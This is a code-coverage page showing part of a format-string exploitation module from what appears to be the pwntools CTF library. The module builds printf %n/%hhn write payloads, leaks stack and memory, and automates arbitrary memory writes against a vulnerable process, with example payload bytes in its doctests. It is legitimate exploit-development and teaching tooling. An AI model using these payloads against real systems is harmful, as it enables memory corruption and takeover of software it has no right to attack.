def make_atoms(writes, sz, szmax, numbwritten, overflows, strategy, badbytes):
1✔
718
    """
719
    Builds an optimized list of atoms for the given format string payload parameters.
720
    This function tries to optimize two things:
721

722
    - use the fewest amount of possible atoms
723
    - sort these atoms such that the amount of padding needed between consecutive elements is small
724

725
    Together this should produce short format strings.
726

727
    Arguments:
728
        writes(dict): dict with addr, value ``{addr: value, addr2: value2}``
729
        sz(int): basic write size in bytes. Atoms of this size are generated without constraints on their values.
730
        szmax(int): maximum write size in bytes. No atoms with a size larger than this are generated (ignored for strategy 'fast')
731
        numbwritten(int): number of byte already written by the printf function
732
        overflows(int): how many extra overflows (of size sz) to tolerate to reduce the length of the format string
733
        strategy(str): either 'fast' or 'small'
734
        badbytes(str): bytes that are not allowed to appear in the payload
735
    """
736
    all_atoms = []
1✔
737
    for address, data in normalize_writes(writes):
1✔
738
        atoms = make_atoms_simple(address, data, badbytes)
1✔
739
        if strategy == 'small':
1!
740
            atoms = merge_atoms_overlapping(atoms, sz, szmax, numbwritten, overflows)
1✔
741
        elif strategy == 'fast':
×
742
            atoms = merge_atoms_writesize(atoms, sz)
×
743
        else:
744
            raise ValueError("strategy must be either 'small' or 'fast'")
×
745
        atoms = sort_atoms(atoms, numbwritten)
1✔
746
        all_atoms += atoms
1✔
747
    return all_atoms
1✔
748

749
def fmtstr_split(offset, writes, numbwritten=0, write_size='byte', write_size_max='long', overflows=16, strategy="small", badbytes=frozenset()):
1✔
750
    """
751
    Build a format string like fmtstr_payload but return the string and data separately.
752
    """
753
    if write_size not in ['byte', 'short', 'int']:
×
754
        log.error("write_size must be 'byte', 'short' or 'int'")
×
755

756
    if write_size_max not in ['byte', 'short', 'int', 'long']:
×
757
        log.error("write_size_max must be 'byte', 'short', 'int' or 'long'")
×
758

759
    sz = WRITE_SIZE[write_size]
×
760
    szmax = WRITE_SIZE[write_size_max]
×
761
    atoms = make_atoms(writes, sz, szmax, numbwritten, overflows, strategy, badbytes)
×
762

763
    return make_payload_dollar(offset, atoms, numbwritten)
×
764

765
def fmtstr_payload(offset, writes, numbwritten=0, write_size='byte', write_size_max='long', overflows=16, strategy="small", badbytes=frozenset(), offset_bytes=0):
1✔
766
    r"""fmtstr_payload(offset, writes, numbwritten=0, write_size='byte') -> str
767

768
    Makes payload with given parameter.
769
    It can generate payload for 32 or 64 bits architectures.
770
    The size of the addr is taken from ``context.bits``
771

772
    The overflows argument is a format-string-length to output-amount tradeoff:
773
    Larger values for ``overflows`` produce shorter format strings that generate more output at runtime.
774

775
    Arguments:
776
        offset(int): the first formatter's offset you control
777
        writes(dict): dict with addr, value ``{addr: value, addr2: value2}``
778
        numbwritten(int): number of byte already written by the printf function
779
        write_size(str): must be ``byte``, ``short`` or ``int``. Tells if you want to write byte by byte, short by short or int by int (hhn, hn or n)
780
        overflows(int): how many extra overflows (at size sz) to tolerate to reduce the length of the format string
781
        strategy(str): either 'fast' or 'small' ('small' is default, 'fast' can be used if there are many writes)
782
    Returns:
783
        The payload in order to do needed writes
784

785
    Examples:
786
        >>> context.clear(arch = 'amd64')
787
        >>> fmtstr_payload(1, {0x0: 0x1337babe}, write_size='int')
788
        b'%322419390c%4$llnaaaabaa\x00\x00\x00\x00\x00\x00\x00\x00'
789
        >>> fmtstr_payload(1, {0x0: 0x1337babe}, write_size='short')
790
        b'%47806c%5$lln%22649c%6$hnaaaabaa\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00'
791
        >>> fmtstr_payload(1, {0x0: 0x1337babe}, write_size='byte')
792
        b'%190c%7$lln%85c%8$hhn%36c%9$hhn%131c%10$hhnaaaab\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00'
793
        >>> context.clear(arch = 'i386')
794
        >>> fmtstr_payload(1, {0x0: 0x1337babe}, write_size='int')
795
        b'%322419390c%5$na\x00\x00\x00\x00'
796
        >>> fmtstr_payload(1, {0x0: 0x1337babe}, write_size='short')
797
        b'%4919c%7$hn%42887c%8$hna\x02\x00\x00\x00\x00\x00\x00\x00'
798
        >>> fmtstr_payload(1, {0x0: 0x1337babe}, write_size='byte')
799
        b'%19c%12$hhn%36c%13$hhn%131c%14$hhn%4c%15$hhn\x03\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00'
800
        >>> fmtstr_payload(1, {0x0: 0x00000001}, write_size='byte')
801
        b'%1c%3$na\x00\x00\x00\x00'
802
        >>> fmtstr_payload(1, {0x0: b"\xff\xff\x04\x11\x00\x00\x00\x00"}, write_size='short')
803
        b'%327679c%7$lln%18c%8$hhn\x00\x00\x00\x00\x03\x00\x00\x00'
804
    """
805
    sz = WRITE_SIZE[write_size]
1✔
806
    szmax = WRITE_SIZE[write_size_max]
1✔
807
    all_atoms = make_atoms(writes, sz, szmax, numbwritten, overflows, strategy, badbytes)
1✔
808

809
    fmt = b""
1✔
810
    for _ in range(1000000):
1!
811
        data_offset = (offset_bytes + len(fmt)) // context.bytes
1✔
812
        fmt, data = make_payload_dollar(offset + data_offset, all_atoms, numbwritten=numbwritten)
1✔
813
        fmt = fmt + cyclic((-len(fmt)-offset_bytes) % context.bytes)
1✔
814

815
        if len(fmt) + offset_bytes == data_offset * context.bytes:
1✔
816
            break
1✔
817
    else:
818
        raise RuntimeError("this is a bug ... format string building did not converge")
×
819

820
    return fmt + data
1✔
821

822
class FmtStr(object):
1✔
823
    """
824
    Provides an automated format string exploitation.
825

826
    It takes a function which is called every time the automated
827
    process want to communicate with the vulnerable process. this
828
    function takes a parameter with the payload that you have to
829
    send to the vulnerable process and must return the process
830
    returns.
831

832
    If the `offset` parameter is not given, then try to find the right
833
    offset by leaking stack data.
834

835
    Arguments:
836
            execute_fmt(function): function to call for communicate with the vulnerable process
837
            offset(int): the first formatter's offset you control
838
            padlen(int): size of the pad you want to add before the payload
839
            numbwritten(int): number of already written bytes
840

841
    """
842

843
    def __init__(self, execute_fmt, offset=None, padlen=0, numbwritten=0):
1✔
844
        self.execute_fmt = execute_fmt
1✔
845
        self.offset = offset
1✔
846
        self.padlen = padlen
1✔
847
        self.numbwritten = numbwritten
1✔
848

849
        if self.offset is None:
1✔
850
            self.offset, self.padlen = self.find_offset()
1✔
851
            log.info("Found format string offset: %d", self.offset)
1✔
852

853
        self.writes = {}
1✔
854
        self.leaker = MemLeak(self._leaker)
1✔
855

856
    def leak_stack(self, offset, prefix=b""):
1✔
857
        payload = b"START%%%d$pEND" % offset
1✔
858
        leak = self.execute_fmt(prefix + payload)
1✔
859
        try:
1✔
860
            leak = re.findall(br"START(.*?)END", leak, re.MULTILINE | re.DOTALL)[0]
1✔
861
            leak = int(leak, 16)
1✔
862
        except ValueError:
1✔
863
            leak = 0
1✔
864
        return leak
1✔
865

866
    def find_offset(self):
1✔
867
        marker = cyclic(20)
1✔
868
        for off in range(1,1000):
1!
869
            leak = self.leak_stack(off, marker)
1✔
870
            leak = pack(leak)
1✔
871

872
            pad = cyclic_find(leak[:4])
1✔
873
            if pad >= 0 and pad < 20:
1✔
874
                return off, pad
1✔
875
        else:
876
            log.error("Could not find offset to format string on stack")
×
877
            return None, None
×
878

879
    def _leaker(self, addr):
1✔
880
        # Hack: elfheaders often start at offset 0 in a page,
881
        # but we often can't leak addresses containing null bytes,
882
        # and the page below elfheaders is often not mapped.
883
        # Thus the solution to this problem is to check if the next 3 bytes are
884
        # "ELF" and if so we lie and leak "\x7f"
885
        # unless it is leaked otherwise.
886
        if addr & 0xfff == 0 and self.leaker._leak(addr+1, 3, False) == b"ELF":
1✔
887
            return b"\x7f"
1✔
888

889
        fmtstr = fit({
1✔
890
          self.padlen: b"START%%%d$sEND" % (self.offset + 16//context.bytes),
891
          16 + self.padlen: addr
892
        })
893

894
        leak = self.execute_fmt(fmtstr)
1✔
895
        leak = re.findall(br"START(.*)END", leak, re.MULTILINE | re.DOTALL)[0]
1✔
896

897
        leak += b"\x00"
1✔
898

899
        return leak
1✔
900

901
    def execute_writes(self):
1✔
902
        """execute_writes() -> None
903

904
        Makes payload and send it to the vulnerable process
905

906
        Returns:
907
            None
908

909
        """
910
        fmtstr = randoms(self.padlen).encode()
1✔
911
        fmtstr += fmtstr_payload(self.offset, self.writes, numbwritten=self.padlen + self.numbwritten, write_size='byte')
1✔
912
        self.execute_fmt(fmtstr)
1✔
913
        self.writes = {}
1✔
914

915
    def write(self, addr, data):
1✔
916
        r"""write(addr, data) -> None
917

918
        In order to tell : I want to write ``data`` at ``addr``.
919

920
        Arguments:
921
            addr(int): the address where you want to write
922
            data(int): the data that you want to write ``addr``
923

924
        Returns:
925
            None
926

927
        Examples:
928

929
            >>> def send_fmt_payload(payload):
930
            ...     print(repr(payload))
931
            ...
932
            >>> f = FmtStr(send_fmt_payload, offset=5)
933
            >>> f.write(0x08040506, 0x1337babe)
934
            >>> f.execute_writes()
935
            b'%19c%16$hhn%36c%17$hhn%131c%18$hhn%4c%19$hhn\t\x05\x04\x08\x08\x05\x04\x08\x07\x05\x04\x08\x06\x05\x04\x08'
936

937
        """
938
        self.writes[addr] = data
1✔
STATUS · Troubleshooting · Open an Issue · Sales · Support · CAREERS · ENTERPRISE · START FREE · SCHEDULE DEMO
ANNOUNCEMENTS · TWITTER · TOS & SLA · Supported CI Services · What's a CI service? · Automated Testing

© 2025 Coveralls, Inc